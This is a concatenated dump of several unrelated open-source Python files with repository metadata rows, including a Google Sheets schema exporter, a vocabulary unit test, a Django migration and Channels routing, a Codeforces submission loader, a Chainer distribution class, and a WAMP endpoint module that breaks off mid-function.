(props[p]['items']['properties'][sp]['type'] == 'array' and props[p]['items']['properties'][sp]['items']['type'] == 'object'):
subprops[p + '.' + sp] = props[p]['items']['properties'][sp]
non_submit.append(p + '.' + sp)
if props[p]['items']['properties'][sp]['type'] == 'array':
for ssp in props[p]['items']['properties'][sp]['items']['properties'].keys():
subprops[p + '.' + sp + '.' + ssp] = props[p]['items']['properties'][sp]['items']['properties'][ssp]
else:
for ssp in props[p]['items']['properties'][sp]['items']['properties'].keys():
subprops[p + '.' + sp + '.' + ssp] = props[p]['items']['properties'][sp]['properties'][ssp]
else:
subprops[p + '.' + sp] = props[p]['items']['properties'][sp]
else:
my_props = props[p]['properties']
for sp in my_props.keys():
subprops[p + '.' + sp] = my_props[sp]
ordered_props.update(subprops)
remove_props = []
ont_props = []
for p in ordered_props.keys():
if str(ordered_props[p].get('comment')).startswith('Do not submit') \
or ordered_props[p].get('notSubmittable') == True:
remove_props.append(p)
if p in non_submit:
non_submit.remove(p)
elif ordered_props[p].get('linkTo') == 'OntologyTerm':
remove_props.append(p)
ont_props.append(p)
for p in remove_props:
del ordered_props[p]
for p in ont_props:
ordered_props[p + '.term_id'] = term_id_props
ordered_props[p + '.term_name'] = term_name_props
non_submit_col = []
for p in non_submit:
non_submit_col.append(cell_grid[list(ordered_props.keys()).index(p) + 1])
# collect required fields & move fields to the front
req_props = []
if schema.get('required'):
req_count = 0
req_props = schema['required']
for i in req_props:
if i in ordered_props:
ordered_props.move_to_end(i, False)
req_count += 1
else:
ordered_props.move_to_end(i + '.term_id', False)
ordered_props.move_to_end(i + '.term_name', False)
req_count += 2
# get the required field columns so we can color them later
req_columns = []
if req_props:
if 'aliases' in ordered_props.keys():
ordered_props.move_to_end('aliases', False)
req_start_col = 'C'
req_stop_col = cell_grid[req_count + 1]
else:
req_start_col = 'B'
req_stop_col = cell_grid[req_count]
req_columns = ':'.join([req_start_col, req_stop_col])
# list the attributes we want to know about each property
descriptor_list = [
'title',
'description',
'comment',
'type',
'linkTo',
'enum'
]
uber_list = []
# gather the top row list of schema_version followed by the property names
schema_version = schema['properties']['schema_version']['default']
prop_list = ['schema_version=' + schema_version]
for p in ordered_props.keys():
prop_list.append(p)
uber_list.append(prop_list)
# gather the attributes of each property
for descriptor in descriptor_list:
this_list = ['#' + descriptor]
for p in ordered_props.keys():
if ordered_props[p]['type'] == 'array' and descriptor in ['type','enum','linkTo']:
if ordered_props[p]['items'].get(descriptor):
this_list.append('array of ' + str(ordered_props[p]['items'].get(descriptor,'')))
else:
this_list.append('')
else:
this_list.append(str(ordered_props[p].get(descriptor,'')))
uber_list.append(this_list)
# write the whole thing to the google sheet
tab.update('A1',uber_list)
# bold the first column
tab.format('A:A', {'textFormat': {'bold': True}})
# set the whole sheet to clip text
tab.format('A1:AZ100',{'wrapStrategy': 'CLIP'})
# set cell validation in the first input row for all boolean fields or fields with an enum list
count = 0
for p in ordered_props.keys():
count += 1
if ordered_props[p].get('enum') or ordered_props[p].get('type') == 'boolean':
col = cell_grid[count]
cell_to_format = col + str(len(descriptor_list) + 2) + ':' + col + '100'
validation_rule = DataValidationRule(BooleanCondition('ONE_OF_LIST',
ordered_props[p].get('enum', ['TRUE','FALSE'])),
showCustomUi=True)
set_data_validation_for_cell_range(tab, cell_to_format, validation_rule)
# aliases should be the first property listed, so freeze that column and the descriptor column
if ordered_props.get('aliases'):
set_frozen(tab, rows=len(descriptor_list) + 1, cols=2)
else: #if no aliases propertry, then just freeze the descriptor column
set_frozen(tab, rows=len(descriptor_list) + 1, cols=1)
# shade all of the columns with required properties
if req_columns:
green = color(0.58, 0.77, 0.49)
format_cell_range(tab, req_columns, cellFormat(backgroundColor=green))
# for the properties with embedded objects, shade the non-submittable property
for column in non_submit_col:
grey = color(0.85, 0.85, 0.85)
format_cell_range(tab, column, cellFormat(backgroundColor=grey))
| 35.576744
| 130
| 0.697085
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,585
| 0.337953
|
af4fa2ce445c7c2f288125fe751a69825469c270
| 8,191
|
py
|
Python
|
tests/forte/data/vocabulary_test.py
|
bhaskar2443053/forte
|
95fabd94126d45c0db07cdcc197049ed1859d228
|
[
"Apache-2.0"
] | null | null | null |
tests/forte/data/vocabulary_test.py
|
bhaskar2443053/forte
|
95fabd94126d45c0db07cdcc197049ed1859d228
|
[
"Apache-2.0"
] | null | null | null |
tests/forte/data/vocabulary_test.py
|
bhaskar2443053/forte
|
95fabd94126d45c0db07cdcc197049ed1859d228
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 The Forte Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pickle as pkl
import unittest
from itertools import product
from ddt import ddt, data, unpack
from asyml_utilities.special_tokens import SpecialTokens
from forte.common import InvalidOperationException
from forte.data import dataset_path_iterator
from forte.data.vocabulary import Vocabulary, FrequencyVocabFilter
@ddt
class VocabularyTest(unittest.TestCase):
def setUp(self):
self.data_path = os.path.abspath(
os.path.join(
os.path.dirname(__file__),
"../../../",
"data_samples",
"random_texts",
)
)
def argmax(self, one_hot):
idx = -1
for i, flag in enumerate(one_hot):
if flag:
self.assertTrue(idx == -1)
idx = i
return idx
def test_vocabulary(self):
methods = ["indexing", "one-hot"]
flags = [True, False]
for method, need_pad, use_unk in product(methods, flags, flags):
# As stated here: https://github.com/python/typing/issues/511
# If we use the generic type here we cannot pickle the class
# in python 3.6 or earlier (the issue is fixed in 3.7).
# So here we do not use the type annotation for testing.
vocab = Vocabulary(method=method, use_pad=need_pad, use_unk=use_unk)
# Check vocabulary add_element, element2repr and id2element
elements = [
"EU",
"rejects",
"German",
"call",
"to",
"boycott",
"British",
"lamb",
".",
]
for ele in elements:
vocab.add_element(ele)
save_len = len(vocab)
for ele in elements:
vocab.add_element(ele)
self.assertEqual(save_len, len(vocab))
representation = [vocab.element2repr(ele) for ele in elements]
self.assertTrue(len(representation) > 0)
if method == "indexing":
self.assertTrue(isinstance(representation[0], int))
else:
self.assertTrue(isinstance(representation[0], list))
recovered_elements = []
for rep in representation:
if method == "indexing":
idx = rep
else:
idx = self.argmax(rep)
recovered_elements.append(vocab.id2element(idx))
self.assertListEqual(elements, recovered_elements)
# Check __len__, items.
self.assertEqual(
len(set(elements)) + int(use_unk) + int(need_pad), len(vocab)
)
saved_len = len(vocab)
# Check has_element
for ele in elements:
self.assertTrue(vocab.has_element(ele))
for ele in range(10):
self.assertFalse(vocab.has_element(ele))
# check PAD_ELEMENT
if need_pad:
if method == "indexing":
expected_pad_repr = 0
else:
expected_pad_repr = [0] * (len(vocab) - 1)
self.assertEqual(
expected_pad_repr, vocab.element2repr(SpecialTokens.PAD)
)
# Check UNK_ELEMENT
if use_unk:
if method == "indexing":
expected_unk_repr = 0 + int(need_pad)
else:
expected_unk_repr = [0] * (len(vocab) - int(need_pad))
expected_unk_repr[0] = 1
self.assertEqual(
expected_unk_repr, vocab.element2repr(SpecialTokens.UNK)
)
self.assertEqual(
expected_unk_repr, vocab.element2repr("random_element")
)
self.assertEqual(saved_len, len(vocab))
# Check state
new_vocab = pkl.loads(pkl.dumps(vocab))
self.assertEqual(vocab.method, new_vocab.method)
self.assertEqual(vocab.use_pad, new_vocab.use_pad)
self.assertEqual(vocab.use_unk, new_vocab.use_unk)
self.assertEqual(vocab._element2id, new_vocab._element2id)
self.assertEqual(vocab._id2element, new_vocab._id2element)
self.assertEqual(vocab.next_id, new_vocab.next_id)
# These cases correspond to different combinations of PAD and UNK, and
# whether we have additional specials.
@data(
(True, False, ["cls", "blah"]),
(False, False, ["cls", "blah"]),
(False, True, ["cls", "blah"]),
(False, False, ["cls", "blah"]),
(True, False, None),
(False, False, None),
(False, True, None),
(False, False, None),
)
@unpack
def test_freq_filtering(self, need_pad, use_unk, special_tokens):
base_vocab = Vocabulary(
use_pad=need_pad, use_unk=use_unk, special_tokens=special_tokens
)
for p in dataset_path_iterator(self.data_path, ".txt"):
with open(p) as f:
for line in f:
for w in line.strip().split():
base_vocab.add_element(w)
vocab_filter = FrequencyVocabFilter(
base_vocab, min_frequency=2, max_frequency=4
)
filtered = base_vocab.filter(vocab_filter)
for e, eid in base_vocab.vocab_items():
if base_vocab.is_special_token(eid):
# Check that the filtered vocab have all special elements.
self.assertTrue(filtered.has_element(e))
else:
base_count = base_vocab.get_count(e)
if 2 <= base_count <= 4:
self.assertTrue(filtered.has_element(e))
self.assertEqual(base_count, filtered.get_count(e))
else:
self.assertFalse(filtered.has_element(e))
self.assertEqual(
len(base_vocab._element2id), len(base_vocab._id2element)
)
@data(
("indexing", 0, 2),
("one-hot", [1, 0, 0, 0, 0], [0, 0, 1, 0, 0]),
)
@unpack
def test_custom_vocab(self, method, expected_pad_value, expected_unk_value):
vocab = Vocabulary(method=method, use_pad=False, use_unk=False)
predefined = {
"[PAD]": -1,
"[CLS]": -1,
"[UNK]": -1,
"a": 2,
"b": 3,
"c": 4,
}
for e, count in predefined.items():
if count == -1:
vocab.add_special_element(e)
else:
vocab.add_element(e, count=count)
# Set the first element [PAD] to be the padding value.
vocab.mark_special_element(0, "PAD")
# Set the third element [UNK] to be the unknown value.
vocab.mark_special_element(2, "UNK")
# Check that padding values are the same as the expected representation.
self.assertEqual(vocab.get_pad_value(), expected_pad_value)
self.assertEqual(vocab.element2repr("[PAD]"), expected_pad_value)
# Check that unknown words are mapped to expected representation.
self.assertEqual(
vocab.element2repr("something else"), expected_unk_value
)
for i in [0, 1, 2]:
self.assertTrue(vocab.is_special_token(i))
with self.assertRaises(InvalidOperationException):
vocab.get_count(i)
if __name__ == "__main__":
unittest.main()
| 35.613043
| 80
| 0.561104
| 7,197
| 0.878647
| 0
| 0
| 7,202
| 0.879258
| 0
| 0
| 1,700
| 0.207545
|
af5046173b41ba95d5ae8b44b58b6a5a51e8848f
| 1,979
|
py
|
Python
|
beerhunter/hops/migrations/0001_initial.py
|
zhukovvlad/beerhunt-project
|
e841f4946c08275e9d189605ffe9026d6657d63f
|
[
"MIT"
] | null | null | null |
beerhunter/hops/migrations/0001_initial.py
|
zhukovvlad/beerhunt-project
|
e841f4946c08275e9d189605ffe9026d6657d63f
|
[
"MIT"
] | null | null | null |
beerhunter/hops/migrations/0001_initial.py
|
zhukovvlad/beerhunt-project
|
e841f4946c08275e9d189605ffe9026d6657d63f
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.9 on 2020-08-24 17:29
import autoslug.fields
from django.db import migrations, models
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='AromaProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
],
options={
'ordering': ('title',),
},
),
migrations.CreateModel(
name='Hop',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('title', models.CharField(max_length=255, verbose_name='Title of Hop')),
('slug', autoslug.fields.AutoSlugField(editable=False, populate_from='title', unique=True, verbose_name='Hop Slug')),
('description', models.TextField(blank=True, verbose_name='Description')),
('alpha_min', models.FloatField(blank=True, null=True)),
('alpha_max', models.FloatField(blank=True, null=True)),
('beta_min', models.FloatField(blank=True, null=True)),
('beta_max', models.FloatField(blank=True, null=True)),
('oil_min', models.FloatField(blank=True, null=True)),
('oil_max', models.FloatField(blank=True, null=True)),
],
options={
'ordering': ('title',),
},
),
]
| 41.229167
| 147
| 0.587671
| 1,808
| 0.913593
| 0
| 0
| 0
| 0
| 0
| 0
| 291
| 0.147044
|
af52d7912236214a17650c5aa0f534f092aa2d20
| 624
|
py
|
Python
|
iot-sandbox/sandbox/sandbox/routing.py
|
d-hrytsenko/virgil-iotkit
|
5e7baa122cd0adeb96bcc45afac7d091e8fd0432
|
[
"BSD-3-Clause"
] | null | null | null |
iot-sandbox/sandbox/sandbox/routing.py
|
d-hrytsenko/virgil-iotkit
|
5e7baa122cd0adeb96bcc45afac7d091e8fd0432
|
[
"BSD-3-Clause"
] | null | null | null |
iot-sandbox/sandbox/sandbox/routing.py
|
d-hrytsenko/virgil-iotkit
|
5e7baa122cd0adeb96bcc45afac7d091e8fd0432
|
[
"BSD-3-Clause"
] | null | null | null |
from channels.auth import AuthMiddlewareStack
from channels.routing import ProtocolTypeRouter, URLRouter
from django.urls import path
from sandbox.apps.devices.consumers import FactoryDevicesConsumer, UserDevicesConsumer
from sandbox.libs.logs.consumers import SandboxLogsConsumer
application = ProtocolTypeRouter({
# (http->django views is added by default)
'websocket': AuthMiddlewareStack(
URLRouter([
path('ws/devices/factory', FactoryDevicesConsumer),
path('ws/devices/user', UserDevicesConsumer),
path('ws/logs/sandbox', SandboxLogsConsumer),
])
),
})
| 34.666667
| 86
| 0.735577
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 107
| 0.171474
|
af54d8608e299a17c445fa8a61556df44ff6ac62
| 3,402
|
py
|
Python
|
scripts/crawler/sites/codeforces_loader.py
|
Takt29/CompetitiveProgrammingArena
|
7b7dfbd103b9abd6ea00156f3b7f6f2d59e40dea
|
[
"MIT"
] | null | null | null |
scripts/crawler/sites/codeforces_loader.py
|
Takt29/CompetitiveProgrammingArena
|
7b7dfbd103b9abd6ea00156f3b7f6f2d59e40dea
|
[
"MIT"
] | null | null | null |
scripts/crawler/sites/codeforces_loader.py
|
Takt29/CompetitiveProgrammingArena
|
7b7dfbd103b9abd6ea00156f3b7f6f2d59e40dea
|
[
"MIT"
] | null | null | null |
import sys
import json
from typing import Optional
from datetime import datetime, timezone
from .submissions_loader import Submission, SubmissionLoader, SubmissionStatus
class CodeforcesSubmissionLoader(SubmissionLoader):
def _normalize_status(self, external_status: str) -> SubmissionStatus:
patterns: list[tuple[SubmissionStatus, str]] = [
(SubmissionStatus.CompileError, 'COMPILATION_ERROR'),
(SubmissionStatus.WrongAnswer, 'WRONG_ANSWER'),
(SubmissionStatus.WrongAnswer, 'CHALLENGED'),
(SubmissionStatus.TimeLimitExceeded, 'TIME_LIMIT_EXCEEDED'),
(SubmissionStatus.MemoryLimitExceeded, 'MEMORY_LIMIT_EXCEEDED'),
(SubmissionStatus.Accepted, 'OK'),
(SubmissionStatus.RuntimeError, 'RUNTIME_ERROR'),
(SubmissionStatus.PresentationError, 'PRESENTATION_ERROR'),
(SubmissionStatus.WaitingForJudging, 'TESTING'),
(SubmissionStatus.TimeLimitExceeded, 'IDLENESS_LIMIT_EXCEEDED'),
(SubmissionStatus.WrongAnswer, 'PARTIAL'),
(SubmissionStatus.InternalError, 'CRASHED'),
]
for pattern in patterns:
if pattern[1] == external_status:
return pattern[0]
print('Unknown Status(Codeforces):', external_status, file=sys.stderr)
return SubmissionStatus.Unknown
def _get(self, since: Optional[datetime] = None) -> list[Submission]:
url = 'http://codeforces.com/api/problemset.recentStatus'
result: list[Submission] = []
submissions_json = self._request(f'{url}?count=1000')
submissions = json.loads(submissions_json)['result']
# 古い順
for submission in reversed(submissions):
user_id = submission['author']['members'][0]['handle']
contest_id = str(submission['problem']['contestId'])
task_id = submission['problem']['index']
submission_id = int(submission['id'])
timestamp = int(submission['creationTimeSeconds'])
status = submission['verdict'] if 'verdict' in submission else ''
score = 1 if self._normalize_status(
status) == SubmissionStatus.Accepted else 0
language = submission['programmingLanguage']
memory = submission['memoryConsumedBytes']
exec_time = submission['timeConsumedMillis']
code_size = 0
data = Submission(
id=submission_id,
external_user_id=user_id,
external_contest_id=f'codeforces:{contest_id}',
score=score,
status=self._normalize_status(status),
language=language,
external_task_id=f'codeforces:{contest_id}:{task_id}',
external_submission_id=f'codeforces:{contest_id}:{submission_id}',
submitted_at=datetime.fromtimestamp(
timestamp, tz=timezone.utc),
memory=memory,
exec_time=exec_time,
code_size=code_size
)
if data.status == SubmissionStatus.WaitingForJudging:
break
if self.latest_id and data.id <= self.latest_id:
continue
if since is not None and data.submitted_at < since:
continue
result.append(data)
return result
| 40.023529
| 82
| 0.620223
| 3,235
| 0.949237
| 0
| 0
| 0
| 0
| 0
| 0
| 570
| 0.167254
|
af55a79f421926129b24a6d21a7c6d4dc299051b
| 1,477
|
py
|
Python
|
chainer/distributions/one_hot_categorical.py
|
lehy/chainer
|
007f86fdc68d9963a01f9d9230e004071a1fcfb2
|
[
"MIT"
] | null | null | null |
chainer/distributions/one_hot_categorical.py
|
lehy/chainer
|
007f86fdc68d9963a01f9d9230e004071a1fcfb2
|
[
"MIT"
] | null | null | null |
chainer/distributions/one_hot_categorical.py
|
lehy/chainer
|
007f86fdc68d9963a01f9d9230e004071a1fcfb2
|
[
"MIT"
] | null | null | null |
import chainer
from chainer.backends import cuda
from chainer import distribution
from chainer.functions.math import exponential
import chainer.functions.math.sum as sum_mod
class OneHotCategorical(distribution.Distribution):
"""OneHotCategorical Distribution.
Args:
p(:class:`~chainer.Variable` or :class:`numpy.ndarray` or \
:class:`cupy.ndarray`): Parameter of distribution.
"""
def __init__(self, p):
super(OneHotCategorical, self).__init__()
self.__p = chainer.as_variable(p)
@property
def p(self):
return self.__p
@property
def batch_shape(self):
return self.p.shape[:-1]
@property
def event_shape(self):
return self.p.shape[-1:]
@property
def _is_gpu(self):
return isinstance(self.p.data, cuda.ndarray)
def log_prob(self, x):
return sum_mod.sum(exponential.log(self.p) * x, axis=-1)
@property
def mean(self):
return self.p
def sample_n(self, n):
xp = cuda.get_array_module(self.p)
obo_p = self.p.data.reshape((-1,) + self.event_shape)
eye = xp.eye(self.event_shape[0])
eps = [xp.random.choice(
one_p.shape[0], size=(n,), p=one_p) for one_p in obo_p]
eps = xp.stack(eps).T.reshape((n,)+self.batch_shape)
eps = eye[eps]
noise = chainer.Variable(eps)
return noise
@property
def variance(self):
return self.p * (1. - self.p)
| 25.465517
| 67
| 0.625592
| 1,300
| 0.880162
| 0
| 0
| 395
| 0.267434
| 0
| 0
| 180
| 0.121869
|
af55a7c4bf87a19d17230ce48e8785f847954198
| 891
|
py
|
Python
|
config.py
|
johannes-gehrs/centos_packages
|
31afe052011594e37175447eae8e7a192bdc9669
|
[
"MIT"
] | 9
|
2016-04-17T02:09:47.000Z
|
2022-02-16T15:50:43.000Z
|
config.py
|
johannes-gehrs/centos_packages
|
31afe052011594e37175447eae8e7a192bdc9669
|
[
"MIT"
] | null | null | null |
config.py
|
johannes-gehrs/centos_packages
|
31afe052011594e37175447eae8e7a192bdc9669
|
[
"MIT"
] | 6
|
2016-09-10T17:42:29.000Z
|
2021-11-28T09:06:36.000Z
|
from __future__ import absolute_import, division, unicode_literals
import os
import logging
OS_VERSIONS = ['6', '7']
DATA_DIR = '/tmp/centos_packages/'
REPO_BASE_URL = 'http://mirror.centos.org/centos/'
REPOSITORIES = ['os', 'updates', 'centosplus', 'extras', 'fasttrack']
REPOSITORIES_PRETTY = {'os': 'Base',
'updates': 'Updates',
'extras': 'Extras',
'fasttrack': 'Fasttrack'}
LIMIT_RESULTS = 250
CACHE_MAX_AGE = 4260
CACHE_IN_DEBUG_MODE = False
def active_repos():
return [repo for repo in REPOSITORIES if not repo == 'centosplus']
# Logging
LOGDIR = DATA_DIR + 'log/'
LOGFILE = LOGDIR + 'centos_packages.log'
if not os.path.isdir(LOGDIR):
os.makedirs(LOGDIR)
logging.basicConfig(filename=LOGFILE,
level=logging.INFO,
format='%(asctime)s %(levelname)s: %(message)s')
| 29.7
| 70
| 0.637486
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 261
| 0.292929
|
af5737ecd87101e9cae87c5d6f7ba311642b6a63
| 2,622
|
py
|
Python
|
bin/autogen.py
|
botleague/leaderboard-generator
|
644bed2b056d04b604a09ab4f1ad78afbc4ceee7
|
[
"MIT"
] | null | null | null |
bin/autogen.py
|
botleague/leaderboard-generator
|
644bed2b056d04b604a09ab4f1ad78afbc4ceee7
|
[
"MIT"
] | null | null | null |
bin/autogen.py
|
botleague/leaderboard-generator
|
644bed2b056d04b604a09ab4f1ad78afbc4ceee7
|
[
"MIT"
] | null | null | null |
import os
import sys
import time
import logging
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
def main():
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
# Don't need Firestore for HTML dev
os.environ['SHOULD_USE_FIRESTORE'] = 'false'
from leaderboard_generator.config import config
# Catch up with unwatched changes
generate()
path = config.root_dir
event_handler = AutoGenTrigger()
observer = Observer()
observer.schedule(event_handler, path, recursive=True)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
def in_html_dir(path):
from leaderboard_generator.config import config
in_static = path.startswith(config.static_dir)
in_templates = path.startswith(config.template_dir)
ret = in_static or in_templates
return ret
def generate():
from leaderboard_generator.generate_site import generate
generate()
class AutoGenTrigger(FileSystemEventHandler):
def __init__(self):
super(AutoGenTrigger, self).__init__()
self.last_gen_time = -1
def on_moved(self, event):
super(AutoGenTrigger, self).on_moved(event)
what = 'directory' if event.is_directory else 'file'
logging.debug("Moved %s: from %s to %s", what, event.src_path,
event.dest_path)
def on_created(self, event):
super(AutoGenTrigger, self).on_created(event)
what = 'directory' if event.is_directory else 'file'
logging.debug("Created %s: %s", what, event.src_path)
def on_deleted(self, event):
super(AutoGenTrigger, self).on_deleted(event)
what = 'directory' if event.is_directory else 'file'
logging.debug("Deleted %s: %s", what, event.src_path)
def on_modified(self, event):
super(AutoGenTrigger, self).on_modified(event)
what = 'directory' if event.is_directory else 'file'
logging.debug("Modified %s: %s", what, event.src_path)
if event.is_directory:
return
if not in_html_dir(event.src_path):
return
if any(x in event.src_path for x in ['___jb']):
return
if self.last_gen_time == -1 or time.time() - self.last_gen_time > 5:
logging.info("Modified %s: %s", what, event.src_path)
generate()
self.last_gen_time = time.time()
if __name__ == '__main__':
main()
| 28.5
| 76
| 0.644165
| 1,443
| 0.550343
| 0
| 0
| 0
| 0
| 0
| 0
| 319
| 0.121663
|
af57910bb3fe47ba44e22a72e31f84c5bdcbf609
| 10,239
|
py
|
Python
|
mdstudio/mdstudio/api/endpoint.py
|
NLeSC/LIEStudio
|
03c163b4a2590b4e2204621e1c941c28a9624887
|
[
"Apache-2.0"
] | 10
|
2017-09-14T07:26:15.000Z
|
2021-04-01T09:33:03.000Z
|
mdstudio/mdstudio/api/endpoint.py
|
NLeSC/LIEStudio
|
03c163b4a2590b4e2204621e1c941c28a9624887
|
[
"Apache-2.0"
] | 117
|
2017-09-13T08:09:48.000Z
|
2019-10-03T12:19:13.000Z
|
mdstudio/mdstudio/api/endpoint.py
|
NLeSC/LIEStudio
|
03c163b4a2590b4e2204621e1c941c28a9624887
|
[
"Apache-2.0"
] | 1
|
2018-09-26T09:40:51.000Z
|
2018-09-26T09:40:51.000Z
|
import json
import uuid
import six
from datetime import timedelta
from types import GeneratorType
from typing import Union, Optional, Callable
from jsonschema import ValidationError
from twisted.internet.defer import _inlineCallbacks, Deferred
from autobahn.wamp import RegisterOptions
from mdstudio.api.api_result import APIResult
from mdstudio.api.converter import convert_obj_to_json
from mdstudio.api.request_hash import request_hash
from mdstudio.api.schema import (ISchema, EndpointSchema, validate_json_schema, ClaimSchema,
MDStudioClaimSchema, InlineSchema, MDStudioSchema)
from mdstudio.deferred.chainable import chainable
from mdstudio.deferred.return_value import return_value
SchemaType = Union[str, dict, ISchema]
def validation_error(schema, instance, error, prefix, uri):
return \
'{prefix} validation on uri "{uri}" failed on "{property}": \n' \
'Subschema:\n{subschema}\ndid not match actual value:\n{subproperty}'.format(
prefix=prefix,
uri=uri,
property='.'.join(error.schema_path),
subschema=json.dumps(error.schema, indent=2),
subproperty=json.dumps(error.instance, indent=2)
)
class WampEndpoint(object):
def __init__(self, wrapped_f, uri, input_schema, output_schema, claim_schema=None, options=None, scope=None):
from mdstudio.component.impl.common import CommonSession
self.uri_suffix = uri
self.uri = None
self.options = options
self.scope = scope
self.instance = None # type: CommonSession
self.wrapped = wrapped_f
self.input_schema = self._to_schema(input_schema, EndpointSchema)
self.output_schema = self._to_schema(output_schema, EndpointSchema)
self.claim_schemas = [MDStudioClaimSchema(CommonSession)]
claim_schema = self._to_schema(claim_schema, ClaimSchema, {})
if claim_schema:
self.claim_schemas.append(claim_schema)
def set_instance(self, instance):
self.instance = instance
self.uri = u'{}.{}.endpoint.{}'.format(
self.instance.component_config.static.vendor,
self.instance.component_config.static.component,
self.uri_suffix
)
def register(self):
return self.instance.register(self, self.uri, options=self.options)
def __call__(self, request, signed_claims=None):
return self.execute(request, signed_claims)
@chainable
def execute(self, request, signed_claims):
if not signed_claims:
return_value(APIResult(error='Remote procedure was called without claims'))
from mdstudio.component.impl.common import CommonSession
request = convert_obj_to_json(request)
claims = yield super(CommonSession, self.instance).call(u'mdstudio.auth.endpoint.verify', signed_claims)
claim_errors = self.validate_claims(claims, request)
if claim_errors:
return_value(claim_errors)
request_errors = self.validate_request(request)
if request_errors:
return_value(request_errors)
result = self.call_wrapped(request, claims['claims'])
if isinstance(result, GeneratorType):
result = _inlineCallbacks(None, result, Deferred())
result = yield result
result = result if isinstance(result, APIResult) else APIResult(result)
convert_obj_to_json(result)
if 'error' in result:
return_value(result)
result_errors = self.validate_result(result.data)
if result_errors:
return_value(result_errors)
if 'error' in result:
return_value(result)
result_errors = self.validate_result(result.data)
if result_errors:
return_value(result_errors)
return_value(result)
def call_wrapped(self, request, claims):
return self.wrapped(self.instance, request, claims)
def validate_claims(self, claims, request):
if 'error' in claims:
res = APIResult(error=claims['error'])
elif 'expired' in claims:
res = APIResult(expired=claims['expired'])
else:
claims = claims['claims']
if claims['requestHash'] != request_hash(request):
res = APIResult(error='Request did not match the signed request')
elif claims['uri'] != self.uri:
res = APIResult(error='Claims were obtained for a different endpoint')
elif claims['action'] != 'call':
res = APIResult(error='Claims were not obtained for the action "call"')
else:
s = None
try:
for s in self.claim_schemas:
validate_json_schema(s.to_schema(), claims)
except ValidationError as e:
res = {'error': validation_error(s.to_schema(), claims, e, 'Claims', self.uri)}
self.instance.log.error('{error_message}', error_message=res['error'])
else:
if not self.instance.authorize_request(self.uri, claims):
res = APIResult(error='Unauthorized call to {}'.format(self.uri))
self.instance.log.error('{error_message}', error_message=res['error'])
else:
# Everything is OK, no errors
res = None
return res
def validate_request(self, request):
schema = self.input_schema.to_schema()
try:
validate_json_schema(schema, request)
except ValidationError as e:
return APIResult(error=validation_error(schema, request, e, 'Input', self.uri))
else:
# No validation errors
return None
def validate_result(self, result):
schema = self.output_schema.to_schema()
try:
validate_json_schema(schema, result)
except ValidationError as e:
res = APIResult(error=validation_error(schema, result, e, 'Output', self.uri))
else:
# No validation errors
res = None
return res
@staticmethod
def _to_schema(schema, schema_type, default_schema=None):
if isinstance(schema, (six.text_type, str)):
schema = schema_type(schema)
elif isinstance(schema, dict):
schema = InlineSchema(schema)
elif isinstance(schema, (schema_type, InlineSchema)):
schema = schema
elif not schema:
schema = InlineSchema({} if default_schema == {} else default_schema or {'type': 'null'})
else:
raise NotImplementedError('{} of type {} is not supported'.format(schema_type.__name__, type(schema)))
return schema
class CursorWampEndpoint(WampEndpoint):
def __init__(self, wrapped_f, uri, input_schema, output_schema, claim_schema=None, options=None, scope=None):
input_schema = InlineSchema({
'oneOf': [
{
'allOf': [
self._to_schema(input_schema, EndpointSchema),
self._to_schema('cursor-parameters/v1', MDStudioSchema)
]
},
self._to_schema('cursor-request/v1', MDStudioSchema),
]
})
output_schema = InlineSchema({
'allOf': [
self._to_schema(output_schema, EndpointSchema),
{
'properties': {
'results': self._to_schema('cursor-response/v1', MDStudioSchema)
}
}
]
})
super(CursorWampEndpoint, self).__init__(wrapped_f, uri, input_schema, output_schema, claim_schema, options, scope)
@chainable
def call_wrapped(self, request, claims):
meta = None
cid = None
if 'next' in request:
cid = request['next']
elif 'previous' in request:
cid = request['previous']
if cid:
meta = json.loads(self.instance.session.cache.extract('cursor#{}'.format(cid)))
if meta.get('uuid') != cid:
return_value(APIResult(error='You tried to get a cursor that doesn\'t exist or is expired. Please check your code.'))
if not meta:
meta = None
paging = {
'uri': self.uri
}
if 'paging' in request and 'limit' in request['paging']:
paging['limit'] = request['paging']['limit']
result, prev, nxt = yield self.wrapped(self.instance, request, claims['claims'], **{'paging': paging, 'meta': meta})
if prev:
prev_uuid = uuid.uuid4()
prev['uuid'] = prev_uuid
paging['previous'] = prev_uuid
self.instance.session.cache.put('cursor#{}'.format(prev_uuid), timedelta(minutes=10), json.dumps(prev))
if next:
next_uuid = uuid.uuid4()
nxt['uuid'] = next_uuid
paging['next'] = next_uuid
self.instance.session.cache.put('cursor#{}'.format(next_uuid), timedelta(minutes=10), json.dumps(nxt))
if not ('paging' in request or 'addPageInfo' in request['paging'] or request['paging']['addPageInfo']):
paging = {
'uri': paging['uri']
}
return_value({
'results': result,
'paging': paging
})
def endpoint(uri, input_schema, output_schema=None, claim_schema=None, options=None, scope=None):
# type: (str, SchemaType, Optional[SchemaType], Optional[SchemaType], Optional[RegisterOptions], Optional[str]) -> Callable
def wrap_f(f):
return WampEndpoint(f, uri, input_schema, output_schema, claim_schema, options, scope)
return wrap_f
def cursor_endpoint(uri, input_schema, output_schema, claim_schema=None, options=None, scope=None):
